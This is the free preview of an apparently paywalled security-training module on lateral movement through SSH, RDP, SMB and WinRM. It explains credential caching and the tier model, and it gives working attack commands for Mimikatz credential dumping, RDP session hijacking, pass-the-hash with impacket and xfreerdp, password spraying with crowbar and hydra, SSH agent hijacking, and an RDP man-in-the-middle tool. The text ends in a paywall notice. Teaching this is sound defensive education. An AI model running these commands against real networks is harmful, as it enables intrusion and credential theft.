SSH, SMB, RDP, WinRM, WMI, and iLO/iDRAC are management protocols — designed for administrators to do their jobs. Attackers love them because they’re everywhere, always allowed between admin endpoints and targets, and every organization has weak or reused credentials that reach through them. This module is about why management protocols are the main rails of lateral movement in 2026.

Why this happens

Management protocols are the backbone of IT operations. Admin needs to log into 500 servers. SSH to 500 Linux boxes. RDP to 200 Windows. PowerShell Remoting (WinRM) to automate. WMI for inventory. SCCM agents call home. iLO/iDRAC for out-of-band. Every one of these is an authenticated channel that, once the attacker has the right credentials, gives full control of the target.

Three things make these high-value:

Credentials reuse. The same admin credentials work on many targets. Attacker who compromises one admin account = many targets.
Credentials cached in memory. When admin RDPs to a server, credentials are cached on that server. Compromise of the server = extraction of admin’s credentials.
Legitimate traffic is indistinguishable from attacks. RDP from admin endpoint to server is normal. RDP from attacker’s foothold to server using stolen creds is also normal. Detection requires context.

The credential-cache problem

When an administrator RDPs from their workstation to a server, Windows caches their credentials on the server in LSASS. If the attacker later compromises the server and has local admin, Mimikatz extracts those cached credentials. Now the attacker has the admin’s credentials without ever compromising the admin’s workstation.

# Attacker compromises a random server via phishing / exploit
# Runs mimikatz or equivalent
sekurlsa::logonpasswords

# Output includes credentials of every user who logged in recently:
# - Domain admin who RDP'd yesterday to troubleshoot
# - Service account whose password is stored
# - Backup admin whose scheduled task runs hourly
# - etc.

# Attacker now has high-privilege credentials from a medium-privilege compromise

This single pattern — Tier 0 admins logging into Tier 1/2 systems — has been responsible for more breach amplification than almost any other technique. It’s why Microsoft’s Tier model exists; it’s why “Privileged Access Workstations” (PAWs) exist.

RDP attacks

# RDP brute force / password spray against external-exposed
crowbar -b rdp -u admin -C passwords.txt -s 10.0.0.0/24

# Network-level RDP hijacking (if attacker is SYSTEM on target server)
mimikatz # ts::sessions
mimikatz # ts::remote /id:2      # connects to victim's disconnected session

# Pass-the-hash over RDP (Restricted Admin mode) — bypass cleartext creds
xfreerdp /u:admin /pth:NTLMHASH /v:10.0.0.5 /restricted-admin

# RDP MITM via Seth
git clone https://github.com/SySS-Research/Seth
./seth.sh eth0 10.0.0.5 10.0.0.10 10.0.0.100
# Captures credentials when admin RDPs through attacker's position

SMB as lateral movement vector

# PsExec — creates a service, runs command, removes service
impacket-psexec CORP/admin:password@10.0.0.5
# Noisy: service creation, event logs

# WMI execution — quieter, no service
impacket-wmiexec CORP/admin:password@10.0.0.5

# WinRM execution
impacket-evil-winrm -u admin -p password -i 10.0.0.5

# Pass-the-hash across all of the above
impacket-psexec -hashes :NTLMHASH CORP/admin@10.0.0.5
impacket-wmiexec -hashes :NTLMHASH CORP/admin@10.0.0.5

SSH attacks beyond brute force

# SSH credential reuse check (worked creds from one target, try others)
hydra -L users.txt -P passwords.txt ssh://10.0.0.0/24 -t 16

# SSH key reuse — extract key from compromised host, try elsewhere
cat ~/.ssh/authorized_keys  # on compromised target
# Often: admins have single key authorizing them to 100+ servers

# SSH Agent hijacking (if attacker gains root on a host with live SSH agent)
SSH_AUTH_SOCK=/tmp/ssh-XXX/agent.YYY ssh admin@nextserver
# Uses the admin's forwarded agent — no key extraction needed

# SSH config enumeration (find where admin connects)
cat ~/.ssh/known_hosts     # reveals many targets
cat ~/.ssh/config          # reveals host aliases, port forwarding

WinRM — a modern PsExec alternative

WinRM (ports 5985/5986) is PowerShell Remoting. Attacker-friendly because it’s commonly allowed in corporate networks and produces fewer logs than PsExec. Evil-WinRM is the standard offensive tool.

🔐 Intermediate Module · Basic Tier

Continue reading with Basic tier (₹499/month)

You've read 27% of this module. Unlock the remaining deep-dive, quiz, and every other Intermediate module.

99+ modulesAll levels up to this tier

20-question quizzesUnlimited retries with explanations

Completion certificatesShareable on LinkedIn

See pricing → Sign in

5 more sections locked below

Module 5 · SSH, RDP, SMB, WinRM — The Lateral Movement Highway 🔒

Why this happens

The credential-cache problem

RDP attacks

SMB as lateral movement vector

SSH attacks beyond brute force

WinRM — a modern PsExec alternative

Continue reading with Basic tier (₹499/month)

Other modules in this track

Module 6 · VPN Appliances — The Crown Jewel <span style="color:#6EC1E4;font-size:0.7em;vertical-align:middle;" title="Academy lesson — sign in for full access">🔒</span>

Module 1 · The Network Is Never Flat <span style="color:#6EC1E4;font-size:0.7em;vertical-align:middle;" title="Academy lesson — sign in for full access">🔒</span>

Module 8 · OT / ICS at the Network Layer <span style="color:#6EC1E4;font-size:0.7em;vertical-align:middle;" title="Academy lesson — sign in for full access">🔒</span>